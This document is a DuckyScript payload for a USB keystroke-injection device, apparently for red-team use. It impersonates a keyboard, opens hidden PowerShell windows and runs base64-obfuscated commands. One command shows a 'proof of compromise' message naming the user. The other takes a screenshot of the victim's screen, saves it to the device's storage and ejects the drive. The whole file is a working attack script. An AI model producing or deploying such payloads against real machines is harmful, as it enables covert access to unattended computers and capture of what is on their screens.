1
REM Defining Attackmode & USB identifiers. These will help the blue team to identify the moment of compromise
2
ATTACKMODE HID STORAGE VID_D3AD PID_B33F MAN_RedTeamCompany PROD_DUCKY SERIAL_25102022
3

4
REM Opening a hidden powershell instance which pops the message box
5
DELAY 2000
6
GUI r
7
DELAY 500
8
STRINGLN powershell -NoP -NonI -w h
9
DELAY 750
10
STRINGLN powershell.exe -enc JABVACAAPQAgAHcAaABvAGEAbQBpADsAJABtAD0AIgAkAFUAIABpAHMAIABjAG8AbgBzAGkAZABlAHIAZQBkACAAYwBvAG0AcAByAG8AbQBpAHMAZQBkACEAIABUAGgAaQBzACAAaQBuAGMAaQBkAGUAbgB0ACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBwAG8AcgB0AGUAZAAuACIAOwAkAEwAIAA9ACAARwBlAHQALQBEAGEAdABlAA0ACgBbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAIgBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAIgApADsAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAkAG0ALAAiACQATAAgAC0AIABQAHIAbwBvAGYAIABvAGYAIABDAG8AbQBwAHIAbwBtAGkAcwBlACIALAAwACwAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AEkAYwBvAG4AXQA6ADoARQB4AGMAbABhAG0AYQB0AGkAbwBuACkA;exit
11
DELAY 500
12
GUI r
13
DELAY 500
14

15
REM New powershell process for generating a proof of compromise screenshot - needs to be a seperate process because of the messagebox
16
STRINGLN powershell -NoP -NonI -w h
17
DELAY 750
18
STRINGLN powershell.exe -enc JABZACAAPQAoACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlACkAOwANAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgACoAbQAuACoAcwAuAEYAKgBzADsADQAKAEEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAqAG0ALgBEAHIAKgBnADsADQAKACQAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAFMAeQBzAHQAZQBtAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBdADoAOgBWAGkAcgB0AHUAYQBsAFMAYwByAGUAZQBuADsADQAKACQAVwAgAD0AIAAkAFMALgBXAGkAZAB0AGgAOwANAAoAJABIACAAPQAgACQAUwAuAEgAZQBpAGcAaAB0ADsADQAKACQARgAgAD0AIAAkAFMALgBMAGUAZgB0ADsADQAKACQAVAAgAD0AIAAkAFMALgBUAG8AcAA7AA0ACgAkAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABXACwAIAAkAEgAOwANAAoAJABHACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4ARwByAGEAcABoAGkAYwBzAF0AOgA6AEYAcgBvAG0ASQBtAGEAZwBlACgAJABCACkAOwANAAoAJABHAC4AQwBvAHAAeQBGAHIAbwBtAFMAYwByAGUAZQBuACgAJABGACwAIAAkAFQALAAgADAALAAgADAALAAgACQAQgAuAFMAaQB6AGUAKQA7AA0ACgAkAEIALgBTAGEAdgBlACgAJABZACsAIgBcAFAAcgBvAG8AZgAuAGIAbQBwACIAKQA7ACQAUgBEACAAPQAgACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0ATwBiAGoAZQBjAHQAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAE4AYQBtAGUAcwBwAGEAYwBlACgAMQA3ACkALgBQAGEAcgBzAGUATgBhAG0AZQAoACQAUgBEACkALgBJAG4AdgBvAGsAZQBWAGUAcgBiACgAJwBFAGoAZQBjAHQAJwApADsARQB4AGkAdAA=;exit
19
DELAY 2000
20
WAIT_FOR_STORAGE_INACTIVITY
21
ATTACKMODE OFF
22

23